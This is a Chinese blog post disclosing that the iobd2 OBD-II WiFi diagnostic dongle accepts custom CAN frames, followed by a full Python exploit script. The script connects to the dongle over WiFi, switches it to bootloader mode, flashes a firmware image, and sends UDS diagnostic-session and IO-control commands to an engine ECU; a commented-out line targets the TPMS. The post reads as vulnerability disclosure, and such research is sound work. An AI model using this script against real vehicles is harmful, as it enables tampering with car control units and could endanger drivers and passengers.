深圳郎仁科技iobd2利用代码

最新推荐文章于 2023-09-12 10:48:47 发布
最新推荐文章于 2023-09-12 10:48:47 发布
阅读量2.2k 收藏 1
点赞数
分类专栏: car hacking 智能硬件安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/autohacker/article/details/50715284
版权

iobd2是朗仁科技新推出的可与iphone操作系统配套的面向个人车主的诊断工具,与iphone手机采用wifi无线方式通讯;支持OBDII/EOBD协议;记录数据通过手机客户端软件读取,在车辆行驶状态下实时采集汽车发动机数据,如发动机的转速、点火时间、燃油修正、发动机转速、及时油耗、冷却液温度等。

通过对iobd2的芯片代码进行逆向发现除了该盒子除了支持标准OBDII之外,还支持自定义can发送,这给车主带来潜在的安全隐患,利用代码实例如下

import socket
import struct



packetID = 0


def send(s,frames):
    global packetID
    sendData = struct.pack("B" , len(frames))
    for frame in frames:
        sendData += struct.pack(">H" , len(frame))
        sendData += frame
    sendPacket = "\x55\xaa" + struct.pack(">HHH" , packetID , len(sendData) , len(sendData)^0xFFFF) + sendData
    cs = 0
    for i in range(0 , len(sendPacket)):
        cs = struct.unpack("B" , sendPacket[i])[0]^cs
    sendPacket += struct.pack("B" , cs)
    packetID = packetID + 1
    s.send(sendPacket)
    print "send:" + repr(sendPacket)
    recvPacket = s.recv(1024)
    print "recv:" + repr(recvPacket)
    

def readBoxSeriesOrder(s):
    print "********readBoxSeriesOrder********"
    cmdBuffer = "\x60\xC1"
    send(s,[cmdBuffer])

def setBoxToBoot(s):
    print "********setBoxToBoot********"
    cmdBuffer = "\x60\xC8"
    send(s,[cmdBuffer])

def readWaitTime(s):
    print "********readWaitTime********"
    cmdBuffer = "\x60\xCD"
    send(s,[cmdBuffer])


def readRestrictVoltage(s):
    print "********readRestrictVoltage********"
    cmdBuffer = "\x60\xCF"
    send(s,[cmdBuffer])

def setRestrictVoltage(s):
    print "********setRestrictVoltage********"
    cmdBuffer = "\x60\xce\x07\x0d"
    send(s,[cmdBuffer])

def setBoxToDownload(s , addr , raw):
    print "********setBoxToDownload********"
    cmdBuffer = "\x60\xCA"    
    cmdBuffer += struct.pack(">I" , addr) + raw
    send(s,[cmdBuffer])

def setBoxToMcu(s):
    print "********setBoxToMcu********"
    cmdBuffer = "\x60\xC9"
    send(s,[cmdBuffer])

def setCommTime(s , p4 , p3 , p2 , p1):
    print "********setCommTime********"
    cmdBuffer = "\x60\x03" + struct.pack(">HHHH" , p1 , p2 , p3 , p4)
    send(s,[cmdBuffer])

def setProtocol(s , protocol , reset):
    print "********setProtocol********"
    cmdBuffer = "\x60\x05" + struct.pack(">BB" , protocol , reset)
    send(s,[cmdBuffer])    

def setBaudRate(s , bps , parity , databit):
    print "********setBaudRate********"    
    cmdBuffer = "\x60\x02" + struct.pack(">IBB" , bps , parity , databit)
    send(s,[cmdBuffer])    

def setCommPort(s , sendLine, recvLine, linkControl):
    print "********setCommPort********"    
    cmdBuffer = "\x60\x01" + struct.pack("<HB" , linkControl , (sendLine << 4)|(recvLine & 255))
    send(s,[cmdBuffer])    

def setCanFilterId(s , *arg):
    print "********setCanFilterId********"
    cmdBuffer = "\x60\x08"
    fortimes = arg[0]&0x7F
    cmdBuffer += struct.pack("B" , fortimes)
    for i in range(0 , fortimes):
        j = 2*i +1
        canId = arg[j]
        cmdBuffer += struct.pack(">H" , canId)
        if arg[0]&0x80 != 0:
            mask =  arg[j+1]
        else:
            mask = 0x7FF
        cmdBuffer += struct.pack(">H" , mask)
    send(s,[cmdBuffer]) 

def autoFlowControl(s , flag , flowControl):
    print "********autoFlowControl********"
    cmdBuffer = "\x60\x09\x03\x01\x10\x0b\x08\x07\xe0\x30\x00\x05\x00\x00\x00\x00\x00\xff"
    send(s,[cmdBuffer])
    



def sendStdCanCommand(s , canbusId , cmd ,flag = 0xD14):
    print "********sendCommand********"
    cmdBuffer = "\x61\x04\x00\x0b\x08" + struct.pack(">H" , canbusId) + cmd + struct.pack("B" , flag&0xFF)
    send(s,[cmdBuffer])
    
    


RAW_START_ADDRESS = 0x08004000
def downloadBin(s , fileName = "lower_b.bin"):
    global packetID
    f = open("lower_b.bin" , "rb")
    addr = RAW_START_ADDRESS
    i=0
    while True:
        raw = f.read(0x800)
        if len(raw) == 0:
            break
        else:
            if i == 7:
                packetID = 0xf               
            setBoxToDownload(s , addr , raw)
            addr += len(raw)
            if i == 13:
                break
            i = i+1
    f.close()
     


if __name__ == '__main__':
    address = ('192.168.0.10', 35000)  
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    s.connect(address)
    
    readBoxSeriesOrder(s)
    setBoxToBoot(s)
    readWaitTime(s)
    readRestrictVoltage(s)
    setRestrictVoltage(s)
    setBoxToBoot(s)

    downloadBin(s)


    setBoxToMcu(s)
    setCommTime(s ,0x5 ,0x37,0xC8,0xC8)
    readBoxSeriesOrder(s)
    setProtocol(s,7,1)#canbus
    
    setBaudRate(s , 0x01040312 , 0 , 8)
    setCommPort(s , 3 , 1 , 0x8C00)
    packetID = 0x1e
    setCanFilterId(s , 0x81 ,0x0700 , 0x0700)
    autoFlowControl(s , 0,[0x08 , 0x07,0xE0,0x30,0x00,0x05,0x00,0x00,0x00,0x00,0x00])
    #sendStdCanCommand(s , 0x7DF , "\x02\x01\x00\x00\x00\x00\x00\x00")
    """
    sendStdCanCommand(s , 0x7D6 , "\x02\x10\x90\x00\x00\x00\x00\x00")
    sendStdCanCommand(s , 0x7D6 , "\x04\x30\x01\x06\x11\x00\x00\x00")#tpms
    """
   
    sendStdCanCommand(s , 0x7E0 , "\x02\x10\x90\x00\x00\x00\x00\x00")
    sendStdCanCommand(s , 0x7E0 , "\x04\x30\x39\x07\xFF\x00\x00\x00")
    sendStdCanCommand(s , 0x7E0 , "\x04\x30\x3A\x07\xFF\x00\x00\x00")
    sendStdCanCommand(s , 0x7E0 , "\x04\x30\x3B\x07\xFF\x00\x00\x00")
    sendStdCanCommand(s , 0x7E0 , "\x04\x30\x3C\x07\xFF\x00\x00\x00")
    
    s.close()



autohacker
关注
专栏目录
深圳市南和移动通信科技股份有限公司.ppt
12-13
深圳市南和移动通信科技股份有限公司是一家专注于移动通信和物联网领域的高新技术企业。该公司成立于2011年,由深圳市南和通讯实业有限公司占据大部分股权,其余由经营骨干和其他个人股东持有。南和移动的总部位于...
【STM32-CAN】基于STM32的OBD监测车速系统设计
Roger_717的博客
03-02 1万+
本文亦在通过OBD技术获取汽车实时车速,OBD技术涉及的内容繁多,如何在如此繁多的内容中提炼出一个行之有效的方法去实现我们的目的是本文的创作目的。所以如果你对OBD不是很熟悉,或者在网络上繁杂的信息里很难提炼出关键的解决手段,通过本文或许会给你一些启发和思路。
汽车功能寻址&标准PID
weixin_58812661的博客
05-15 1071
标准PID;功能寻址;会话服务
AUTOSAR-UDS诊断
最新发布
aaaaaaaa123345的博客
09-12 2924
从图中可以看出,诊断服务属于 AutoSAR 服务层,诊断数据流通过CAN驱动CANIF 层 CANTP PDUR DCM 给到 DCM 模块,DCM 模块处理诊断数据,并执行对应的具体诊断服务。Diagnostic Communication Manager,诊断通信管理。实现具体的诊断协议,比如 UDS、 OBD。这里具体定义了各种不同的诊断服务,比如读取 ECU 故障码、写入 DID 数据等。
OBD2协议实用指南
虹科汽车网络技术的博客
04-24 5572
这是一篇OBD2(On Board Diagnostic )协议的简单、实用指南。
UDS(二)网络层
weixin_44522306的博客
01-29 1万+
  UDS网络层,是为了解决ISO 11898 协议中的经典can数据链路层与UDS 应用层 ISO 14229 协议中定义的应用层,彼此的数据长度不一样问题。经典can数据链路层最大支持8字节,但 ISO 14229 不仅仅支持can总线设计的,其最大容量是达到4095字节。如UDS应用需要发送20字节数据信息,而can不能一帧报文处理完,需要3帧才能发送完毕。那么如何将多字节数据通过can进行有效,有序的传输呢?ISO 15765-2 由此而生。 一、前言与简介 ISO 15765-2的第一版为ISO
2023深圳杯数学建模C题论文及代码(合集,内含两篇,均为原创)
08-21
2023深圳杯C题无人机协同避障航迹规划,两篇论文(附代码),两篇分别由两个团队打造,均为原创首发,分开的两篇文章基于几何构形和人工势场的无人机协调避障问题研究、基于计算几何与等间距遍历的无人机避障规划...
深圳市华夏盛科技有限公司SCADA数字电台手册
03-20
深圳市华夏盛科技有限公司SCADA数字电台手册是一份详细的指导文档,提供了关于该公司生产的一系列SCADA(Supervisory Control And Data Acquisition)数字电台产品的信息。SCADA系统广泛应用于工业自动化和信息技术...
2023深圳杯数学建模C题论文及代码(硬核):基于计算几何与等间距遍历的无人机避障规划研究
08-21
2023深圳杯C题无人机协同避障航迹规划,博主发布的第二篇思路完全不同的深圳杯C题论文,同样原创首发,由不同的团队耗费大量精力打造,感兴趣的可以到博主页面下购买两篇的合集。该团队自身不参加深圳杯比赛,内容供...
深圳科技公司物流教学软件流程说明(ppt-79页).ppt
11-01
深圳科技公司的这款物流教学软件详细地涵盖了从客户资料管理、工厂资料设定到业务数据处理、结算操作以及系统权限配置等多个方面,通过79页的PPT内容进行全面阐述。 首先,软件的总体流程主要围绕客户资料、工厂...
2015 朗新科技 C++ 笔试题
10-15
2015年朗新科技笔试题,很基础的内容,仅供学习参考
读取ISO15031协议数据流
jianxuezixuan的博客
04-13 2345
一、ISO15031协议 所有与排放相关的OBD ECU,如果至少支持ISO 15031中定义的一种服务,则应支持服务0x01和PID:0x00。 服务0x01和PID:0x00被定义为所有与排放相关的OBD ECUs的通用“initialization/keep alive/ping”消息。 1、设备先按照11位CAN-ID(0x7DF)去请求,看车辆是否支持,如果支持的话,有哪些数据流可以获取。 OBD外接测试设备初始化确定波特率 设置好波特率后,请求如下:7DF 02 01 00 00 00 0
汽车OBD2诊断程序开发 (原文转载,思路很清晰!)
xqhrs232的专栏
02-27 1万+
原文地址::https://www.cnblogs.com/mike88992/p/3274497.html相关文章1、一个完整的汽车OBD仪器的源码,每个模块的代码都在里面----http://www.pudn.com/Download/item/id/3057338.html2、汽车OBDCAN信息解析----http://www.docin.com/p-1208669019.html3、车联...
CAPL实现UDS下载框架
fz835304205的专栏
01-08 6047
最近在做CAPL实现UDS下载,本下载框架可实现配置修改,提高效率。核心代码如下。 includes { #pragma library (".\Exec32\MMSound.dll") #pragma library (".\Exec32\osek_tp.dll") } variables { long physHandle; long cantpHandl...
OBD数据读取
热门推荐
w7822055的专栏
04-16 3万+
我国采用了EOBD相同的要求即ISO15031-5(道路车辆-车辆与排放诊断相 关装置通信标准-5排放有关的诊断服务)协议。 所以只要该车支持ISO15031-5的OBD2标准协议中所有项,则可以通过OBD接口读取出ECU中所有信息;若该车支持标准协议中部分项,则读取出支持项信息。(标准协议附在下面,由北京金奔腾汽车科技公司提供。) 在ISO15031-5协议中,油耗不能读取,只能读取燃油液
【教程】CANoe基础——过滤总线报文
汽车电子软件领域知识分享
03-10 9244
背景 当时用CANoe观测总线报文或实际项目开发中需要观测某些ID报文时,不想在Trace中看到其他ID的报文,那就可以使用CAN Filter设置将不关心的报文滤除,在Trace中只显示你关心的报文。 方法描述 1.打开 Measurement Setup 在Analysis栏,打开 Measurement Setup,如下图: 2.插入CFB 在Trace前面的“节点处”鼠标右键,如下图: ...
ISO15765-4 协议 汽车ECU系统模拟
weixin_43729724的博客
09-24 7602
ISO15765-4 协议 汽车ECU系统模拟 本节介绍的代码量比较多,用到的知识也比较丰富,篇幅较长! 看完这篇文章能够掌握的知识包括:ISO15765-4协议、USART串口通信协议、CAN通信协议、中断等。 一、USART串口通信 串口通信:串口按位(bit)发送和接收字节。 参数包括:波特率、数据位、停止位和奇偶校验位。对于两个进行通信的端口,这些参数必须匹配。 波特率:即单位时间内载波参...
深圳科技大学微电子学概览
"深圳科技大学微电子学" 微电子学是信息技术领域的核心学科,它涉及电子设备、集成电路(IC)的设计、制造以及应用。深圳科技大学的微电子学专业旨在培养具有深厚理论基础和实践技能的专业人才,以应对现代科技的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值